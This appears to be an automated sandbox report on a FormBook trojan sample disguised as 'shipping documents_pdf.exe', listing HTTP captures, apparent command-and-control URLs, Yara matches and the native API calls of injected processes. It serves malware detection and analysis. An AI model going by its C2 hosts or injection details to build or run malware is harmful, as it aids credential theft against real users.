77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 06:32:14 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 06:32:17 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 06:32:19 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 06:32:51 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 36 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v6hi/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 06:32:54 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 36 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v6hi/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 06:32:57 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 36 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v6hi/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 30 Sep 2024 06:33:33 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-30T06:33:38.7120932Z

Source: schtasks.exe, 00000004.00000002.3516006037.0000000003714000.00000004.10000000.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000002.3514610443.0000000002DC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2176596569.0000000020CE4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://cricketinsights.info/7r21/?GX4dS=Zcl8OC2U2mZSOodQP89hLxJaF9oxIylC3vQVS5j
Source: jsmAYDUnVBUZ.exe, 00000007.00000002.3515959197.0000000004E63000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.mynotebook.shop
Source: jsmAYDUnVBUZ.exe, 00000007.00000002.3515959197.0000000004E63000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.mynotebook.shop/3q2o/
Source: schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: schtasks.exe, 00000004.00000002.3513571976.0000000000590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: schtasks.exe, 00000004.00000002.3513571976.00000000005B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: schtasks.exe, 00000004.00000002.3513571976.0000000000590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: schtasks.exe, 00000004.00000002.3513571976.0000000000590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033)
Source: schtasks.exe, 00000004.00000002.3513571976.0000000000590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: schtasks.exe, 00000004.00000002.3513571976.0000000000590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: schtasks.exe, 00000004.00000002.3513571976.0000000000590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: schtasks.exe, 00000004.00000003.2064574437.0000000007598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1889137660.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1888596212.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3513291317.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3515959197.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3514584308.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3514539139.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1889137660.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1888596212.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3513291317.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3515959197.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3514584308.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3514539139.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: shipping documents_pdf.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042C393 NtClose,	1_2_0042C393
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F735C0 NtCreateMutant,LdrInitializeThunk,	1_2_02F735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72B60 NtClose,LdrInitializeThunk,	1_2_02F72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_02F72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F74340 NtSetContextThread,	1_2_02F74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F73090 NtSetValueKey,	1_2_02F73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F73010 NtOpenDirectoryObject,	1_2_02F73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F74650 NtSuspendThread,	1_2_02F74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72AF0 NtWriteFile,	1_2_02F72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72AD0 NtReadFile,	1_2_02F72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72AB0 NtWaitForSingleObject,	1_2_02F72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72BF0 NtAllocateVirtualMemory,	1_2_02F72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72BE0 NtQueryValueKey,	1_2_02F72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72BA0 NtEnumerateValueKey,	1_2_02F72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72B80 NtQueryInformationFile,	1_2_02F72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F739B0 NtGetContextThread,	1_2_02F739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72EE0 NtQueueApcThread,	1_2_02F72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72EA0 NtAdjustPrivilegesToken,	1_2_02F72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72E80 NtReadVirtualMemory,	1_2_02F72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72E30 NtWriteVirtualMemory,	1_2_02F72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72FE0 NtCreateFile,	1_2_02F72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72FB0 NtResumeThread,	1_2_02F72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72FA0 NtQuerySection,	1_2_02F72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72F90 NtProtectVirtualMemory,	1_2_02F72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72F60 NtCreateProcessEx,	1_2_02F72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72F30 NtCreateSection,	1_2_02F72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72CF0 NtOpenProcess,	1_2_02F72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72CC0 NtQueryVirtualMemory,	1_2_02F72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72CA0 NtQueryInformationToken,	1_2_02F72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72C70 NtFreeVirtualMemory,	1_2_02F72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72C60 NtCreateKey,	1_2_02F72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72C00 NtQueryInformationProcess,	1_2_02F72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72DD0 NtDelayExecution,	1_2_02F72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72DB0 NtEnumerateKey,	1_2_02F72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F73D70 NtOpenThread,	1_2_02F73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72D30 NtUnmapViewOfSection,	1_2_02F72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72D10 NtMapViewOfSection,	1_2_02F72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F73D10 NtOpenProcessToken,	1_2_02F73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72D00 NtSetInformationFile,	1_2_02F72D00
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D74340 NtSetContextThread,LdrInitializeThunk,	4_2_02D74340
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D74650 NtSuspendThread,LdrInitializeThunk,	4_2_02D74650
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D735C0 NtCreateMutant,LdrInitializeThunk,	4_2_02D735C0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72AD0 NtReadFile,LdrInitializeThunk,	4_2_02D72AD0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72AF0 NtWriteFile,LdrInitializeThunk,	4_2_02D72AF0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72B60 NtClose,LdrInitializeThunk,	4_2_02D72B60
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D739B0 NtGetContextThread,LdrInitializeThunk,	4_2_02D739B0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_02D72EE0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72FE0 NtCreateFile,LdrInitializeThunk,	4_2_02D72FE0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72FB0 NtResumeThread,LdrInitializeThunk,	4_2_02D72FB0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72F30 NtCreateSection,LdrInitializeThunk,	4_2_02D72F30
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_02D72CA0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_02D72C70
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72C60 NtCreateKey,LdrInitializeThunk,	4_2_02D72C60
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72DD0 NtDelayExecution,LdrInitializeThunk,	4_2_02D72DD0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_02D72DF0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_02D72D10
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_02D72D30
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D73090 NtSetValueKey,	4_2_02D73090
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D73010 NtOpenDirectoryObject,	4_2_02D73010
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72AB0 NtWaitForSingleObject,	4_2_02D72AB0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72BF0 NtAllocateVirtualMemory,	4_2_02D72BF0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72BE0 NtQueryValueKey,	4_2_02D72BE0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72B80 NtQueryInformationFile,	4_2_02D72B80
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72BA0 NtEnumerateValueKey,	4_2_02D72BA0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72E80 NtReadVirtualMemory,	4_2_02D72E80
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72EA0 NtAdjustPrivilegesToken,	4_2_02D72EA0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72E30 NtWriteVirtualMemory,	4_2_02D72E30
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72F90 NtProtectVirtualMemory,	4_2_02D72F90
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72FA0 NtQuerySection,	4_2_02D72FA0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72F60 NtCreateProcessEx,	4_2_02D72F60
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72CC0 NtQueryVirtualMemory,	4_2_02D72CC0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72CF0 NtOpenProcess,	4_2_02D72CF0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72C00 NtQueryInformationProcess,	4_2_02D72C00
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72DB0 NtEnumerateKey,	4_2_02D72DB0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D73D70 NtOpenThread,	4_2_02D73D70
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D73D10 NtOpenProcessToken,	4_2_02D73D10
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D72D00 NtSetInformationFile,	4_2_02D72D00
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00429060 NtClose,	4_2_00429060
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00428D60 NtCreateFile,	4_2_00428D60
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00428ED0 NtReadFile,	4_2_00428ED0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00428FC0 NtDeleteFile,	4_2_00428FC0
